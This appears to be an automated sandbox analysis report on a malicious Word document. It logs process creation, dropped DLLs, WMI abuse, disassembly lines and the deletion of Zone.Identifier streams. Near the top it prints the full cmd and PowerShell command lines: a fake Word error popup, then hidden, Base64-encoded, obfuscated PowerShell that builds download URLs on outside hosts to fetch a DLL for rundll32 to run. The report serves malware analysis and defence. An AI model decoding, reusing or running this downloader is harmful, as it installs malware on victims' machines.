Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcA

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001208D0 push edx; ret	6_2_001209D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001039A0 push cs; ret	6_2_001039A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00102A01 push esi; ret	6_2_00102A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00105BD8 push ss; iretd	6_2_00105C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00105C29 push ss; iretd	6_2_00105C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0010548F push ebp; retf	6_2_00105496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00102CFB push ecx; retn 001Eh	6_2_00102D01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00101740 push DA0FDC41h; iretd	6_2_00101745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_003608D0 push edx; ret	7_2_003609D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_003439A0 push cs; ret	7_2_003439A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00342A01 push esi; ret	7_2_00342A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00345BD8 push ss; iretd	7_2_00345C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00345C29 push ss; iretd	7_2_00345C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0034548F push ebp; retf	7_2_00345496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00342CFB push ecx; retn 001Eh	7_2_00342D01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00341740 push DA0FDC41h; iretd	7_2_00341745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002608D0 push edx; ret	8_2_002609D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002439A0 push cs; ret	8_2_002439A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00242A01 push esi; ret	8_2_00242A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00245BD8 push ss; iretd	8_2_00245C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00245C29 push ss; iretd	8_2_00245C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0024548F push ebp; retf	8_2_00245496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00242CFB push ecx; retn 001Eh	8_2_00242D01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00241740 push DA0FDC41h; iretd	8_2_00241745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001B08D0 push edx; ret	9_2_001B09D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001939A0 push cs; ret	9_2_001939A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00192A01 push esi; ret	9_2_00192A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00195BD8 push ss; iretd	9_2_00195C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00195C29 push ss; iretd	9_2_00195C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019548F push ebp; retf	9_2_00195496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00192CFB push ecx; retn 001Eh	9_2_00192D01

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Gyuopigcwtoen\gfvxluzjzkjy.upj

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Gyuopigcwtoen\gfvxluzjzkjy.upj:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ofzzkuwngkcnufwj\wvmgxwsmudidtny.hvy:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Wjzei\rjte.fnz:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Hrjzsjr\mlycub.kot:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Cqtptfsfibbnlgn\rmzbyllndllgsq.bnt:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
